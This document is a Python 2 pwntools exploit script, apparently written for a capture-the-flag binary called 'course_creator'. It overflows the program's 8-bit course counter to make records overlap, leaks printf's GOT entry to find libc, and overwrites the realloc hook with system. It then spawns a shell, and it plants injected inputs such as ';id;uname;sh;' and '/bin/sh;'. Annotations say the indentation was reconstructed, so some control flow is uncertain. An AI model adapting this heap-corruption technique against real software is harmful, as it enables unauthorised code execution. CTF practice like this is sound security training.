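import time
from pwn import *

# NOTE: this file is Python 2 (print statements, str used as raw bytes for
# pwntools I/O, integer '/' division in the allocs table); it is not valid
# Python 3 as written. The source was recovered from a collapsed one-line
# paste, so the indentation below is a reconstruction.
context(arch = 'i386', os = 'linux')


#class R(remote):
class R(process):
    """Driver for the challenge program's text menu.

    Subclasses pwntools ``process`` (a ``remote`` base is left commented out
    above) and keeps two counters the main script relies on: ``cc`` (calls to
    add_course so far) and ``tc`` (teachers filled in via add_teachers so
    far). Every method waits for a fragment of the program's prompt and
    answers it; the fragments must match the program's output exactly, so a
    changed banner desynchronises the whole session.
    """

    def __init__(self,*a,**kw):
        super(R,self).__init__(*a,**kw)
        self.cc = 0   # add_course calls; read modulo 256 below
        self.tc = 0   # teachers filled in (not the announced count)

    def menu(self):
        # Block until the main-menu prompt (ending in "do?\n") is shown.
        self.recvuntil('do?\n')

    def send_number(self,n):
        # Numeric answers are sent with a trailing space; the program echoes
        # a '>> ' marker afterwards which is consumed here.
        self.send(str(n)+' ')
        self.recvuntil('>> ')
        # self.recvline()

    def cmd(self,idx):
        """Pick option ``idx`` from the main menu."""
        self.menu()
        self.send_number(idx)

    def _edit_teacher(self,name,age,note=None):
        """Answer the name / age / note prompts for one teacher.

        ``name`` and ``note`` are sent verbatim (callers pass raw packed
        bytes); ``age`` goes through send_number. A falsy ``note`` answers
        'n' to the note question, so '' behaves like None.
        """
        self.recvuntil('What\'s the name of teacher')
        self.sendline(name)
        self.recvuntil('?')
        self.send_number(age)
        self.recvuntil('y/n\n')
        if note:
            self.sendline('y')
            self.recvuntil('say about')
            self.sendline(note)
        else:
            self.sendline('n')

    def add_teachers(self,tcdata,count=None):
        """Menu 1: announce ``count`` teachers, then fill in ``tcdata``.

        ``tcdata`` is a list of (name, age[, note]) tuples. ``count`` falls
        back to len(tcdata) when it is None or 0; the main script also calls
        this with an empty list and count=65534, which only sends the number.
        ``tc`` grows by len(tcdata), never by ``count``.
        """
        self.cmd(1)
        # Fixed: the original addressed the module-level ``r`` here instead of
        # ``self``. Both name the same object in this script, but the method
        # must not depend on that global.
        self.recvuntil('?')
        self.send_number(count if count else len(tcdata))
        for t in tcdata:
            self._edit_teacher(*t)
        self.tc += len(tcdata)

    def edit_teacher(self,tid,name,age,note=None):
        """Menu 4: select teacher ``tid`` and re-enter its name/age/note."""
        self.cmd(4)
        self.recvuntil('edit.')
        self.sendline(str(tid))
        self._edit_teacher(name,age,note)

    def add_course(self,title,tid,summary,desc,desclen=None,do_edit=False,send_title=False):
        """Menu 2: create (or edit) a course and send its description.

        ``desclen`` is the length announced to the program before ``desc`` is
        sent; when it is not an int, len(desc) is announced instead. The main
        script deliberately announces lengths that differ from the data it
        sends. ``do_edit`` answers 'y' to the program's y/n question;
        ``send_title`` forces the title to be sent even when editing.
        ``cc`` is incremented once per call regardless of outcome.
        """
        def new_desc():
            # Title / teacher-id / summary prompts. The title is only sent
            # when creating, or when send_title overrides that.
            self.recvuntil('e?')
            if not do_edit or send_title:
                self.sendline(title)
            self.recvuntil('?')
            self.send_number(tid)
            self.recvuntil('?')
            self.sendline(summary)
        self.cmd(2)
        # The first byte of the reply decides whether a y/n question was
        # printed. NOTE(review): the nesting of the ``else`` below was
        # reconstructed from the collapsed source; the alternative reading
        # (``else`` belonging to ``if do_edit``) should be checked against the
        # original file.
        if self.recvn(1) == 'T':
            self.recvuntil('y/n\n')
            self.sendline('y' if do_edit else 'n')
            if do_edit:
                new_desc()
        else:
            new_desc()
        self.recvuntil('?')
        self.sendline(str(desclen if type(desclen)==int else len(desc)))
        self.recvuntil(':')
        self.sendline(desc)
        self.cc +=1

    def list_courses(self):
        """Menu 5: print title/summary/teacher-id/description per course.

        Reads ``cc % 256`` entries, i.e. it assumes the program keeps an
        8-bit course counter (inferred from the modulo; not verifiable here).
        """
        self.cmd(5)
        self.recvuntil(':')
        for _ in range(self.cc%256):
            self.recvuntil('Title: ')
            title=self.recvline().strip()
            self.recvuntil('Summary: ')
            summ = self.recvline().strip()
            self.recvuntil('TeacherID: ')
            tid = int(self.recvline().strip())
            self.recvuntil('Description: ')
            desc=self.recvline().strip()
            print title,summ,tid,desc

    def _get_teacher(self):
        """Parse one teacher record: returns (id, name, age, note).

        The id line is read up to its last character (``[:-1]`` drops a
        trailing punctuation mark of the program's own format).
        """
        self.recvuntil('Teacher ')
        tich=int(self.recvline().strip()[:-1])
        self.recvuntil('Name: ')
        name = self.recvline().strip()
        self.recvuntil('Age: ')
        age = int(self.recvline().strip())
        self.recvuntil('Note: ')
        note=self.recvline().strip()
        return tich,name,age,note

    def list_teachers(self,tid='all'):
        """Menu 3: list teacher ``tid`` (or every teacher with 'all').

        Returns a list of (id, name, age, note) tuples; with 'all' exactly
        ``tc`` records are read, so teachers that were only announced via
        ``count`` are not parsed.
        """
        self.cmd(3)
        self.recvuntil('all.')
        self.sendline(str(tid))
        rows=[]   # renamed from ``r`` to stop shadowing the module-level session
        if tid == 'all':
            for _ in range(self.tc):
                rows.append(self._get_teacher())
        else:
            rows.append(self._get_teacher())
        return rows


def leak(r):
    """Earlier leak attempt; defined but never called by the script below.

    Kept for reference: it fills memory with large announced descriptions,
    then places a packed GOT address in a description and reads it back as
    teacher 1's name.
    """
    fake_teacher = p32(elf.got['printf']) + p32(1337) + "dupa"
    r.add_teachers([])#,count=-1) #//first_tich)
    ## spam some memory
    print '[*] spamming...',
    for i in range(194):
        # print '[%d] spamming'%i
        r.add_course('PWN101',4294967295,'A'*128,'E'*0x10,desclen=0x15000)
    print 'done.'
    r.add_course('PWN102',0x41424344,'B'*128,'C'*256,desclen=0xf100,do_edit=True)
    r.add_course('PWN103',0x41424344,'D'*128,'X'*0x40 + fake_teacher,do_edit=True)
    printf_a=r.list_teachers(1)[0][1][:4]
    return u32(printf_a)


# Session against the local copy; the remote endpoint is left commented out.
#r = R('149.13.33.84',1520)
r = R('/tmp/course_creator_cdc4c575f7bf08f82d0536c17e2f7b47')
elf= ELF('/tmp/course_creator_cdc4c575f7bf08f82d0536c17e2f7b47')
#print hex(elf.got['printf'])
# i=0
size = 0x80000000;   # unused
# Announced description lengths, largest first. Python 2 integer division:
# 2147483647/2 == 1073741823.
allocs=[2147483647/2,2147483647/2,1073741824,536870912,134217728,67108864,67108864,33554432,33554432,16777216,8388608,8388608]
print '[*] spamming',
for s in allocs:
    print '.',
    r.add_course('PWN101',1,'x','x',desclen=s)
print
r.add_teachers([('asdf',0x41414141,';id;uname;sh;')])
r.add_teachers([],count=65534) ## 112 is my broken teacher (author's note, translated from Polish)
#raw_input('dbg')
# Drive the course counter to 255 before the next two calls.
while r.cc != 255:
    r.add_course('PWN102',1,'a','x')
print r.cc
r.add_course('PWN102',10,'','x',do_edit=True)
# Title payload: 0x48 filler bytes followed by the packed GOT slot of printf.
r.add_course('A'*0x48 + p32(elf.got['printf']),1,'','x')#,do_edit=True)
# Teacher 113's "name" is read back and its first 4 bytes unpacked as the
# leaked pointer; presumably the title above overlaps that record (not
# verifiable from this file).
xx=r.list_teachers('113')[0]
#print xx
pa=u32(xx[1][:4])
print '[*] printf',hex(pa)
# Build-specific libc offsets; the commented set is the alternative build.
# libc = pa - 0x004CC40 #0x49450 #
# rehook = libc + 0x1a7404#0x01B6764#
# system = libc + 0x03FCD0# 0x3aeb0 # remote:
libc = pa - 0x49450 #
rehook = libc + 0x01B6764#
system = libc + 0x3aeb0 # remote:
# Sanity check on the leak: in Python '&' binds tighter than '!=', so this is
# (libc & 0xfff) != 0 — abort unless the computed base is page-aligned.
if libc &0xfff != 0:
    exit(1)
print '[*] libc',hex(libc)
print '[*] system', hex(system)
print '[*] realloc hook',hex(rehook)
print '[*] rewinding'
# Bring the 8-bit course counter back to 0 before the final writes.
while r.cc%256 != 0:
    r.add_course('PWN102',1,'a','x')
print r.cc
r.add_course('/bin/sh;'+'A'*0x40 + p32(rehook),1,'','x')#,do_edit=True)
r.edit_teacher(113,p32(system),1,'x')
raw_input('dbg')
r.add_teachers([])
r.interactive()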